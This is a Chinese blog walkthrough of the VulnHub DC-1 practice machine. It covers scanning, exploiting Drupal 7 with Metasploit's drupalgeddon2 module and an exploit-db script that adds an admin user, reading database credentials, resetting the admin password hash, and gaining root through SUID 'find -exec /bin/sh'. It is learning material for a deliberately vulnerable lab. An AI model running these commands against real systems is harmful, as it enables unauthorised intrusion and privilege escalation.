vulnhub-DC-1渗透测试

已于 2024-03-15 20:26:58 修改
阅读量6.3k 收藏 2
点赞数 1
分类专栏: vulnhub 文章标签: vulnhub
于 2021-11-21 11:38:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/121403084
版权

环境搭建

官网https://download.vulnhub.com/dc/DC-1.zip
将ova直接拖到vmware中,第一次还是失败重试后成功
在这里插入图片描述
刚开始遇到了点小问题,环境搭建好后利用kali nmap扫不到,并且启动靶机时一直报驱动的错。解决方法就是将桥接模式换成NAT模式(“桥接”和“NAT”方式区别),然后移除CD/DVD(IDE)
在这里插入图片描述在这里插入图片描述

思路

首先nmap扫描ip地址及端口号,进入web页面发现一个7版本的Drupal,利用msf中已存的漏洞可以直接打进去并且发现flag1并且提示配置文件,通过配置文件找到flag2并获得一个数据库账号密码,在原有shell前提下利用python稳定一下bash,在数据库中搞一个账号密码在网页进行登陆后就能得到flag3并且提示需要用find提权,同时我们也可以在shadow中找到flag4,shadow中的确有flag4并且密码可以通过爆破搞出来,但这里通过find命令查找有特殊权限suid的命令,利用find命令提权后可在/home下直接拿到flag4,当然最后也在/root下拿到flag5。

题目描述

DC-1是一个专门构建的易受攻击的实验环境,目的是获得渗透测试的经验。

它的设计对初学者来说是一个挑战,但是它的难易程度取决于您的技能和知识以及学习能力。

要成功完成此挑战,您需要具备Linux技能,熟悉Linux命令行以及具有使用基本渗透测试工具(例如可在Kali Linux或Parrot
Security OS上找到的工具)的经验。

有多种获得root的方法,但是,其中包含了一些flag,这些flag包含了一些线索。

总共有五个flag,但是最终目标是在root的主目录中找到并读取该flag。您甚至不需要成为root用户即可执行此操作,但是,您将需要root特权。

根据您的技能水平,您可能可以跳过查找这些标志中的大多数标志并直接寻找根。

初学者可能会遇到他们以前从未遇到过的挑战,但是Google搜索应该是获得完成此挑战所需信息所需要的全部。

渗透测试

kali的地址为192.168.22.128,用arp-scan扫同段其他主机

arp-scan option [rhost]
-f <s>从指定文件中读取主机名或地址
-l从网络接口配置生成地址
-i 各扫描之间的时间差 
-r 每个主机扫描次数
-t <i>设置主机超时时间 
-V显示程序版本并退出
-I<s>使用网络接口 
-g不显示重复的数据
-D显示数据包往返时间

在这里插入图片描述

也可以用nmap扫

sudo nmap -sP 192.168.22.0/24

Nmap中文手册
在这里插入图片描述

知道地址为192.168.22.129,再用nmap扫端口

nmap -sV 192.168.64.0/24

在这里插入图片描述

得到三个端口80web页面,22ssh端口,111RPC端口,访问80端口的页面
在这里插入图片描述

发现是一个Drupal的站点,使用了Drupal框架(Drupal与WordPress,哪个是更好的CMS),这里直接msf上机,查找可以针对Drupal的模块

msfconsole
search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2  //只有两个能用
show options
set  RHOSTS 192.168.22.129
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

得到一个会话后,利用会话再得到shell

flag1
cat flag1.txt
Every good CMS needs a config file - and so do you.
每一个好的CMS都需要一个配置文件-你也是。

drupal配置文件的位置是在sites/default/files

cd sites/default/
cat settings.php
flag2

在这里插入图片描述

Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

暴力破解和字典攻击不是获得访问权限的唯一方法(您将需要访问权限)。你可以用这些凭据做什么?

既然获得数据库的账号密码那就登录上继续找,不过这里需要先用python转换成标准的shell,否则进入mysql之后shell就没有反应

python -c 'import pty; pty.spawn("/bin/bash")'

这里转换标准shell是起初用的python ‐c "import pty;pty.spawn('/bin/bash')",但是报错显示python: can't open file '‐c': [Errno 2] No such file or directory
在这里插入图片描述

mysql -u dbuser -p R0ck3t
show databases;
use drupaldb;
show tables;
select * from users;
select name,pass from users;

在这里插入图片描述
这里的pass是经过drupal加密,所以到这一步想要搞到可以登陆的账号密码有两种方法

利用msf中攻击脚本

参考Vulnhub靶场DC-1 WP
在这里插入图片描述

searchsploit Drupal 7
python /usr/share/exploitdb/exploits/php/webapps/34992.py -u test -p test -t http://192.168.22.129

在这里插入图片描述

查数据发现已经添加成功
在这里插入图片描述

利用drupal脚本生成加密密码进行替换

利用根目录中的scripts对test(自己想要设置的密码)进行加密,然后修改admin的密码为加密后的test,这里只能在这个目录下,不然会报路径的错

cd /var/www
./scripts/password-hash.sh test  
hash: $S$DVVPB4mtGz78GkvETWehVbaWAt07NaMiP2zxQKY9zN4SVTw85jtL

在这里插入图片描述

update users set pass='$S$DVVPB4mtGz78GkvETWehVbaWAt07NaMiP2zxQKY9zN4SVTw85jtL'
where name='admin';
flag3

在web页面进行登录,在仪表盘里发现flag3
在这里插入图片描述

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
特殊的PERMS 将帮助查找密码——但您需要-exec 该命令来确定如何获取shadow中的内容。

我们使用find找下具有root权限的suid(【安全科普】Linux提权——利用可执行文件SUID )

 ‐perm 按照文件权限来查找文件
 ‐u=w 基于用户可写查找  //s就是root用户的意思
 ‐type f 查找普通类型文件
find / -perm -u=s -type f 2>/dev/null

可以看到find是可以用来提权的,我们尝试用find执行命令,这里需要注意‐name参数填写的文件名,是需要系统真实存在的(我们知道存在flag4,所以直接用)

find / -name flag4 -exec "/bin/sh" \;

在这里插入图片描述

flag4

在这里插入图片描述
参考Vulnhub靶机实战——DC-1这里使用hydra+John密码包对flag4的密码进行爆破,爆破密码为:flag4/orange,拿到账号密码后可以连接ssh登陆系统,但这里已经拿到了root权限,可以直接进/home中找到flag4
在这里插入图片描述

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

你能用同样的方法来查找或访问根目录中的标志吗?
可能。但也许不是那么容易。或许是这样?
flag5

前面通过find拿到root权限,这里同样直接到/root目录下get flag

在这里插入图片描述

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7


做得好!!!!!

希望你喜欢这个并学到了一些新的技能。

你可以让我知道你对这次小旅行的看法。

通过Twitter联系我-@dcau7
Matat4
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机DC系列-DC-1
m0_54525483的博客
12-21 215
Vulnhub靶机DC系列-DC-1 靶场名称:DC-1 下载地址: DC-1.zip (Size: 733 MB) http://www.five86.com/downloads/DC-1.zip (Mirror): https://download.vulnhub.com/dc/DC-1.zip (Torrent): https://download.vulnhub.com/dc/DC-1.zip.torrent (Magnet) VMware->文件->打开->选中 .
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 455
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
VulnHub靶机 DC-7 打靶 渗透详细流程
最新发布
rumil的博客
04-22 927
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2512
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机渗透测试——DC-6
Cobra的博客
05-18 358
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.186 二、信息收集 1、使用nmap探测存活主机 nmap -sP 192.168.189.0/24 2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描 nmap -sV -A -T4 -p- 192.168.189.186 3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件 4、修改完成后即可正常访问
Vulnhub:fourandsix2渗透测试
mandarava的博客
03-11 410
。。。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透
weixin_48991458的博客
11-16 5587
菜鸡的第一篇学习分享 ——Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透 关于Vulnhub:Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。https://www.vulnhub.com/ 根据Vulnhub的要求是要拿到root权限和5个flag,有了大体思路。(Vulnhub每个靶机上都有相应的提示,这一点很良心!) 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 靶机难度:入门 靶机描述:DC-1
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4466
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 172
DC-1详解
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1483
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2494
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1553
vulnhub的dc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
Vulnhub靶场之DC-1
0nc3的博客
06-18 1093
0x00 前言 这是一篇莫得灵魂的关键处复现解题记录,大佬们都tql 下载链接:https://download.vulnhub.com/dc/DC-1.zip 靶场难度:初级(适合我这种小萌新) 0x01 信息收集 扫描一下DC-1靶机分配到的IP 再使用SYN连接扫描一下 可以看到80端口是打开的,访问一下 到处翻了翻也没发现啥,查看robots.txt好像也没啥用 在网站下方提示为dr...
【安全】vulnhub实验dc1
qq_43017750的博客
12-23 2532
靶机下载链接:https://download.vulnhub.com/dc/DC-1.zip 主机发现 首先使用nmap发现网络中存活的主机 发现了目标主机192.168.56.101 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sP -sn -n -T4 --host-timeout 5 192.168.56.0/24 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值